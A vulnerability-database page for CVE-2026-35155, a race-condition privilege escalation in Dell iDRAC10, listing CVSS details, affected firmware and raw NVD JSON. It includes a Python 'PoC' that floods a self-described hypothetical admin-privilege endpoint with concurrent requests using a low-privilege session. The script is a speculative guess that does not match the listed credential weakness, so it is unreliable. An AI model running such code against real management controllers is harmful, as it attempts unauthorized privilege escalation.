Security Vulnerability Report
中文
CVE-2026-35155 CVSS 7.1 HIGH

CVE-2026-35155

Published: 2026-04-29 05:16:05
Last Modified: 2026-05-01 17:40:44

Description

Dell iDRAC10, versions 1.20.70.50 and 1.30.05.10, contains an Insufficiently Protected Credentials vulnerability. A race condition vulnerability exists that could allow an authenticated low‑privileged attacker to gain elevated access.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:idrac10_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dell:idrac10:-:*:*:*:*:*:*:* - NOT VULNERABLE
Dell iDRAC10 1.20.70.50
Dell iDRAC10 1.30.05.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import threading # Target URL (Hypothetical endpoint for privilege change) TARGET_URL = "https://<idrac-ip>/api/users/privilege" SESSION_ID = "<low_priv_session_cookie>" def exploit_thread(): """ Simulates a race condition request to elevate privileges. This function attempts to send a request concurrent with another action to bypass privilege checks. """ headers = { "Cookie": f"session={SESSION_ID}", "Content-Type": "application/json" } # Payload attempting to set admin privileges payload = { "userId": "current", "privilege": "admin" } try: response = requests.post(TARGET_URL, json=payload, headers=headers, verify=False, timeout=2) if response.status_code == 200: print("[+] Potential privilege escalation detected!") print(f"[+] Response: {response.text}") except Exception as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": # Spawn multiple threads to trigger the race condition threads = [] print("[*] Starting Race Condition Exploit for CVE-2026-35155...") for i in range(50): t = threading.Thread(target=exploit_thread) threads.append(t) t.start() for t in threads: t.join() print("[*] Exploit attempt finished.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35155", "sourceIdentifier": "[email protected]", "published": "2026-04-29T05:16:04.523", "lastModified": "2026-05-01T17:40:44.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell iDRAC10, versions 1.20.70.50 and 1.30.05.10, contains an Insufficiently Protected Credentials vulnerability. A race condition vulnerability exists that could allow an authenticated low‑privileged attacker to gain elevated access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:idrac10_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.30.10.50", "matchCriteriaId": "233EC5F2-043A-4999-BD05-3A78E0845407"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dell:idrac10:-:*:*:*:*:*:*:*", "matchCriteriaId": "5BFCEF7B-7BE5-49C4-9206-C8417174E313"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000452298/dsa-2026-187-security-update-for-dell-idrac10-vulnerability", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}